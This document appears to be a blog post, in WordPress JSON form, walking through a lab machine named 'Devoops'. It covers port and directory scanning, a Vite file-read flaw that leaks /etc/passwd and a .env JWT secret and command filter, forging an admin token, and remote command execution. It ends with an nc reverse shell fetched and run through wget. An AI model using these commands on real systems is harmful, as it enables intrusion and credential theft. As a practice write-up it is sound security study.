{"id":1107,"date":"2025-06-04T21:17:15","date_gmt":"2025-06-04T13:17:15","guid":{"rendered":"http:\/\/xiyu12.top\/?p=1107"},"modified":"2025-06-04T21:17:15","modified_gmt":"2025-06-04T13:17:15","slug":"devoops","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=1107","title":{"rendered":"Devoops"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">Information Gathering<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ nmap -sn 192.168.249.0\/24\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-04 09:07 EDT\nNmap scan report for 192.168.249.13\nHost is up (0.011s latency).\nMAC Address: 1E:A3:33:FC:CE:96 (Unknown)\nNmap scan report for 192.168.249.195\nHost is up (0.00016s latency).\nMAC Address: 08:00:27:64:54:DC (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nNmap scan report for 192.168.249.253\nHost is up (0.00018s latency).\nMAC Address: 38:D5:7A:E0:D5:C1 (Cloud Network Technology Singapore PTE.)\nNmap scan report for 192.168.249.254\nHost is up.\nNmap done: 256 IP addresses (4 hosts up) scanned in 28.02 seconds\n\n\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ nmap -p- 192.168.249.195\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-04 09:08 EDT\nNmap scan report for 192.168.249.195\nHost is up (0.00042s latency).\nNot shown: 65534 closed tcp ports (reset)\nPORT     STATE SERVICE\n3000\/tcp open  ppp\nMAC Address: 08:00:27:64:54:DC (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 14.67 seconds\n\n\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ nmap -sCV -p3000 192.168.249.195\nStarting Nmap
7.95 ( https:\/\/nmap.org ) at 2025-06-04 09:09 EDT\nNmap scan report for 192.168.249.195\nHost is up (0.00040s latency).\n\nPORT     STATE SERVICE VERSION\n3000\/tcp open  ppp?\n| fingerprint-strings: \n|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, NCP, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: \n|     HTTP\/1.1 400 Bad Request\n|   FourOhFourRequest, GetRequest: \n|     HTTP\/1.1 403 Forbidden\n|     Vary: Origin\n|     Content-Type: text\/plain\n|     Date: Wed, 04 Jun 2025 13:09:47 GMT\n|     Connection: close\n|     Blocked request. This host (undefined) is not allowed.\n|     allow this host, add undefined to `server.allowedHosts` in vite.config.js.\n|   HTTPOptions, RTSPRequest: \n|     HTTP\/1.1 204 No Content\n|     Vary: Origin, Access-Control-Request-Headers\n|     Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE\n|     Content-Length: 0\n|     Date: Wed, 04 Jun 2025 13:09:47 GMT\n|_    Connection: close\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">web 3000 node.js<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/image-1024x605.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/image-1024x605.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1108\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> gobuster dir -u 
http:\/\/192.168.249.195:3000\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt --exclude-length 414\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n&#91;+] Url:                     http:\/\/192.168.249.195:3000\/\n&#91;+] Method:                  GET\n&#91;+] Threads:                 10\n&#91;+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n&#91;+] Negative Status codes:   404\n&#91;+] Exclude Length:          414\n&#91;+] User Agent:              gobuster\/3.6\n&#91;+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/server               (Status: 200) &#91;Size: 21764]\n\/sign                 (Status: 200) &#91;Size: 189]\n\/execute              (Status: 401) &#91;Size: 48]\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl http:\/\/192.168.249.195:3000\/server\nimport __vite__cjsImport0_express from \"\/node_modules\/.vite\/deps\/express.js?v=5d7e4f89\"; const express = __vite__cjsImport0_express.__esModule ? __vite__cjsImport0_express.default : __vite__cjsImport0_express;\nimport __vite__cjsImport1_jsonwebtoken from \"\/node_modules\/.vite\/deps\/jsonwebtoken.js?v=5d7e4f89\"; const jwt = __vite__cjsImport1_jsonwebtoken.__esModule ? 
__vite__cjsImport1_jsonwebtoken.default : __vite__cjsImport1_jsonwebtoken;\nimport \"\/node_modules\/.vite\/deps\/dotenv_config.js?v=5d7e4f89\"\nimport __vite__cjsImport3_child_process from \"\/@id\/__vite-browser-external:child_process\"; const exec = __vite__cjsImport3_child_process&#91;\"exec\"];\nimport __vite__cjsImport4_util from \"\/@id\/__vite-browser-external:util\"; const promisify = __vite__cjsImport4_util&#91;\"promisify\"];\n\nconst app = express();\n\nconst address = 'localhost';\nconst port = 3001;\n\nconst exec_promise = promisify(exec);\n\nconst COMMAND_FILTER = process.env.COMMAND_FILTER\n    ? process.env.COMMAND_FILTER.split(',')\n        .map(cmd => cmd.trim().toLowerCase())\n        .filter(cmd => cmd !== '')\n    : &#91;];\n\napp.use(express.json());\n\nfunction is_safe_command(cmd) {\n    if (!cmd || typeof cmd !== 'string') {\n        return false;\n    }\n    if (COMMAND_FILTER.length === 0) {\n        return false;\n    }\n\n    const lower_cmd = cmd.toLowerCase();\n\n    for (const forbidden of COMMAND_FILTER) {\n        const regex = new RegExp(`\\\\b${forbidden.replace(\/&#91;.*+?^${}()|&#91;\\]\\\\]\/g, '\\\\$&amp;')}\\\\b|^${forbidden.replace(\/&#91;.*+?^${}()|&#91;\\]\\\\]\/g, '\\\\$&amp;')}$`, 'i');\n        if (regex.test(lower_cmd)) {\n            return false;\n        }\n    }\n\n    if (\/&#91;;&amp;|]\/.test(cmd)) {\n        return false;\n    }\n    if (\/&#91;&lt;>]\/.test(cmd)) {\n        return false;\n    }\n    if (\/&#91;`$()]\/.test(cmd)) {\n        return false;\n    }\n\n    return true;\n}\n\nasync function execute_command_sync(command) {\n    try {\n        const { stdout, stderr } = await exec_promise(command);\n\n        if (stderr) {\n            return { status: false, data: { stdout, stderr } };\n        }\n        return { status: true, data: { stdout, stderr } };\n    } catch (error) {\n        return { status: true, data: error.message };\n    }\n}\n\napp.get('\/', (req, res) => {\n    return res.json({\n  
      'status': 'working',\n        'data': `listening on http:\/\/${address}:${port}`\n    })\n})\n\napp.get('\/api\/sign', (req, res) => {\n    return res.json({\n        'status': 'signed',\n        'data': jwt.sign({\n            uid: -1,\n            role: 'guest',\n        }, process.env.JWT_SECRET, { expiresIn: '1800s' }),\n    });\n});\n\napp.get('\/api\/execute', async (req, res) => {\n    const authorization_header_raw = req.headers&#91;'authorization'];\n    if (!authorization_header_raw || !authorization_header_raw.startsWith('Bearer ')) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': 'permission denied'\n        });\n    }\n\n    const jwt_raw = authorization_header_raw.split(' ')&#91;1];\n\n    try {\n        const payload = jwt.verify(jwt_raw, process.env.JWT_SECRET);\n        if (payload.role !== 'admin') {\n            return res.status(403).json({\n                'status': 'rejected',\n                'data': 'permission denied'\n            });\n        }\n    } catch (err) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': `permission denied`\n        });\n    }\n\n    const command = req.query.cmd;\n\n    const is_command_safe = is_safe_command(command);\n    if (!is_command_safe) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': `this command is unsafe`\n        });\n    }\n\n    const result = await execute_command_sync(command);\n\n    return res.json({\n        'status': result.status === true ? 
'executed' : 'failed',\n        'data': result.data\n    })\n});\n\napp.listen(port, address, () => {\n    console.log(`Listening on http:\/\/${address}:${port}`)\n});\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The command execution code; authentication is required<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>app.get('\/api\/execute', async (req, res) => {\n    const authorization_header_raw = req.headers&#91;'authorization'];\n    if (!authorization_header_raw || !authorization_header_raw.startsWith('Bearer ')) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': 'permission denied'\n        });\n    }\n\n    const jwt_raw = authorization_header_raw.split(' ')&#91;1];\n\n    try {\n        const payload = jwt.verify(jwt_raw, process.env.JWT_SECRET);\n        if (payload.role !== 'admin') {\n            return res.status(403).json({\n                'status': 'rejected',\n                'data': 'permission denied'\n            });\n        }\n    } catch (err) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': `permission denied`\n        });\n    }\n\n    const command = req.query.cmd;\n\n    const is_command_safe = is_safe_command(command);\n    if (!is_command_safe) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': `this command is unsafe`\n        });\n    }\n\n    const result = await execute_command_sync(command);\n\n    return res.json({\n        'status': result.status === true ?
'executed' : 'failed',\n        'data': result.data\n    })\n});<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Foothold<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Accessing sign returns a JWT token. Read together with the code, this is the JWT from the code.js code; it is used for authentication, after which commands can be executed.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Contents of the JWT<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>app.get('\/api\/sign', (req, res) => {\n    return res.json({\n        'status': 'signed',\n        'data': jwt.sign({\n            uid: -1,\n            role: 'guest',\n        }, process.env.JWT_SECRET, { expiresIn: '1800s' }),\n    });\n});<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Submitting the JWT for authentication<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>app.get('\/api\/execute', async (req, res) => {\n    const authorization_header_raw = req.headers&#91;'authorization'];\n    if (!authorization_header_raw || !authorization_header_raw.startsWith('Bearer ')) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': 'permission denied'\n        });\n    }\n    try {\n        const payload = jwt.verify(jwt_raw, process.env.JWT_SECRET);\n        if (payload.role !== 'admin') {\n            return res.status(403).json({\n                'status': 'rejected',\n                'data': 'permission denied'\n            });\n        }\n    } catch (err) {\n        return res.status(401).json({\n            'status': 'rejected',\n            'data': `permission denied`\n        });\n    }<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Trying it out shows this works: with the JWT submitted, a non-admin role gets a 403.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ curl -I
http:\/\/192.168.249.195:3000\/execute -H \"Authorization: Bearer \"\nHTTP\/1.1 401 Unauthorized\nVary: Origin\nx-powered-by: Express\ncontent-type: application\/json; charset=utf-8\ncontent-length: 48\netag: W\/\"30-rLvMChMv+pJKO\/lWTBS3l8hflxA\"\ndate: Wed, 04 Jun 2025 14:16:33 GMT\nconnection: close\n\n\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ curl -s  http:\/\/192.168.249.195:3000\/sign |jq .data\n\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOi0xLCJyb2xlIjoiZ3Vlc3QiLCJpYXQiOjE3NDkwNDY2MjgsImV4cCI6MTc0OTA0ODQyOH0.8ZnjQ7wEceXhwvoDn8RCCDiAP6gI8vCHogYDk1lhWBQ\"\n\n\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ curl -s  http:\/\/192.168.249.195:3000\/sign |jq .data | xargs -I {} curl -I http:\/\/192.168.249.195:3000\/execute -H \"Authorization: Bearer {}\"\n\nHTTP\/1.1 403 Forbidden\nVary: Origin\nx-powered-by: Express\ncontent-type: application\/json; charset=utf-8\ncontent-length: 48\netag: W\/\"30-rLvMChMv+pJKO\/lWTBS3l8hflxA\"\ndate: Wed, 04 Jun 2025 14:17:50 GMT\nconnection: close\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Tried brute-forcing the secret with hashcat;
nothing was recovered.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hashcat -m 16500 ~\/Desktop\/jwt.txt -a 0 \/usr\/share\/wordlists\/rockyou.txt --force<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Vite: later I noticed Vite, which has a file read vulnerability.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;192.168.249.195:3000\/@fs\/etc\/passwd?import&amp;raw??\nexport default \"root:x:0:0:root:\/root:\/bin\/sh\\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\\nsync:x:5:0:sync:\/sbin:\/bin\/sync\\nshutdown:x:6:0:shutdown:\/sbin:\/sbin\/shutdown\\nhalt:x:7:0:halt:\/sbin:\/sbin\/halt\\nmail:x:8:12:mail:\/var\/mail:\/sbin\/nologin\\nnews:x:9:13:news:\/usr\/lib\/news:\/sbin\/nologin\\nuucp:x:10:14:uucp:\/var\/spool\/uucppublic:\/sbin\/nologin\\ncron:x:16:16:cron:\/var\/spool\/cron:\/sbin\/nologin\\nftp:x:21:21::\/var\/lib\/ftp:\/sbin\/nologin\\nsshd:x:22:22:sshd:\/dev\/null:\/sbin\/nologin\\ngames:x:35:35:games:\/usr\/games:\/sbin\/nologin\\nntp:x:123:123:NTP:\/var\/empty:\/sbin\/nologin\\nguest:x:405:100:guest:\/dev\/null:\/sbin\/nologin\\nnobody:x:65534:65534:nobody:\/:\/sbin\/nologin\\nklogd:x:100:101:klogd:\/dev\/null:\/sbin\/nologin\\nchrony:x:101:102:chrony:\/var\/log\/chrony:\/sbin\/nologin\\nrunner:x:1000:1000:::\/bin\/sh\\nhana:x:1001:100::\/home\/hana:\/bin\/sh\\ngitea:x:102:82:gitea:\/var\/lib\/gitea:\/bin\/sh\\n\"\n\nhttp:\/\/192.168.249.195:3000\/@fs\/home\/hana\/user.txt?import&raw??\nEACCES: permission denied, open '\/home\/hana\/user.txt'\n\n    at async open (node:internal\/fs\/promises:638:25)\n    at async Object.readFile (node:internal\/fs\/promises:1242:14)\n    at async LoadPluginContext.load (file:\/\/\/opt\/node\/node_modules\/.pnpm\/vite@6.2.0\/node_modules\/vite\/dist\/node\/chunks\/dep-ByPKlqZ5.js:13528:11)\n    at async EnvironmentPluginContainer.load
(file:\/\/\/opt\/node\/node_modules\/.pnpm\/vite@6.2.0\/node_modules\/vite\/dist\/node\/chunks\/dep-ByPKlqZ5.js:47602:22)\n    at async loadAndTransform (file:\/\/\/opt\/node\/node_modules\/.pnpm\/vite@6.2.0\/node_modules\/vite\/dist\/node\/chunks\/dep-ByPKlqZ5.js:41252:22\n\nFound the path \/opt\/node\/; try reading the configuration file\nhttp:\/\/192.168.249.195:3000\/@fs\/opt\/node\/.env?import&raw??\n\nexport default \"JWT_SECRET='2942szKG7Ev83aDviugAa6rFpKixZzZz'\\nCOMMAND_FILTER='nc,python,python3,py,py3,bash,sh,ash,|,&amp;,&lt;,>,ls,cat,pwd,head,tail,grep,xxd'\\n\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">secret  2942szKG7Ev83aDviugAa6rFpKixZzZz<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/image-1-1024x412.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/image-1-1024x412.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1113\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Getting a reverse shell: the commands in \u201cCOMMAND_FILTER='nc,python,python3,py,py3,bash,sh,ash,|,&amp;,&lt;,>,ls,cat,pwd,head,tail,grep,xxd'\u201d are filtered.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> echo
\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjEsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc0OTA0Nzk4OSwiZXhwIjoxNzQ5MDQ5Nzg5fQ.sWGyZ_xBFSU8OvHlg4EIeH6laioJQyhbxO0ZEDjrWug\"| xargs -I {} curl  http:\/\/192.168.249.195:3000\/execute?cmd=id -H \"Authorization: Bearer {}\"\n\n{\"status\":\"executed\",\"data\":{\"stdout\":\"uid=1000(runner) gid=1000(runner) groups=1000(runner)\\n\",\"stderr\":\"\"}}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Upload a file and run it to get the reverse shell<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> echo \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjEsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc0OTA0Nzk4OSwiZXhwIjoxNzQ5MDQ5Nzg5fQ.sWGyZ_xBFSU8OvHlg4EIeH6laioJQyhbxO0ZEDjrWug\"| xargs -I {} curl  http:\/\/192.168.249.195:3000\/execute?cmd=wget+-h -H \"Authorization: Bearer {}\"\n\n{\"status\":\"executed\",\"data\":\"Command failed: wget -h\\nwget: unrecognized option: h\\nBusyBox v1.37.0 (2025-01-17 18:12:01 UTC) multi-call binary.\\n\\nUsage: wget &#91;-cqS] &#91;--spider] &#91;-O FILE] &#91;-o LOGFILE] &#91;--header STR]\\n\\t&#91;--post-data STR | --post-file FILE] &#91;-Y on\/off]\\n\\t&#91;-P DIR] &#91;-U AGENT] &#91;-T SEC] URL...\\n\\nRetrieve files via HTTP or FTP\\n\\n\\t--spider\\tOnly check URL existence: $?
is 0 if exists\\n\\t--header STR\\tAdd STR (of form 'header: value') to headers\\n\\t--post-data STR\\tSend STR using POST method\\n\\t--post-file FILE\\tSend FILE using POST method\\n\\t-c\\t\\tContinue retrieval of aborted transfer\\n\\t-q\\t\\tQuiet\\n\\t-P DIR\\t\\tSave to DIR (default .)\\n\\t-S    \\t\\tShow server response\\n\\t-T SEC\\t\\tNetwork read timeout is SEC seconds\\n\\t-O FILE\\t\\tSave to FILE ('-' for stdout)\\n\\t-o LOGFILE\\tLog messages to FILE\\n\\t-U STR\\t\\tUse STR for User-Agent header\\n\\t-Y on\/off\\tUse proxy\\n\"}\n\n cat a\nrm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&amp;1|nc 192.168.70.254 8888 >\/tmp\/f\n\n\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ python3 -m http.server\nServing HTTP on 0.0.0.0 port 8000 (http:\/\/0.0.0.0:8000\/) ...\n\n\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ echo \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjEsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc0OTA0Nzk4OSwiZXhwIjoxNzQ5MDQ5Nzg5fQ.sWGyZ_xBFSU8OvHlg4EIeH6laioJQyhbxO0ZEDjrWug\"| xargs -I {} curl  http:\/\/192.168.249.195:3000\/execute?cmd=wget+http:\/\/192.168.249.1:8000\/a+-O+\/tmp\/a -H \"Authorization: Bearer {}\"\n\n{\"status\":\"failed\",\"data\":{\"stdout\":\"\",\"stderr\":\"Connecting to 192.168.249.1:8000 (192.168.249.1:8000)\\nsaving to '\/tmp\/a'\\na                    100% |********************************|    81  0:00:00 ETA\\n'\/tmp\/a' saved\\n\"}}\n\n\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ echo
\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjEsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc0OTA0Nzk4OSwiZXhwIjoxNzQ5MDQ5Nzg5fQ.sWGyZ_xBFSU8OvHlg4EIeH6laioJQyhbxO0ZEDjrWug\"| xargs -I {} curl  http:\/\/192.168.249.195:3000\/execute?cmd=source+\/tmp\/a -H \"Authorization: Bearer {}\"\n\n\n rlwrap nc -lvnp 8888\nlistening on &#91;any] 8888 ...\nconnect to &#91;192.168.249.1] from (UNKNOWN) &#91;192.168.249.195] 39595\n\/bin\/sh: can't access tty; job control turned off\n\/opt\/node $ \n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Information Gathering web 3000 node.js The command execution code; authentication is required Foothold Accessing sign returns a JWT
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1107","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/1107","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1107"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/1107\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1107"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1107"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1107"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}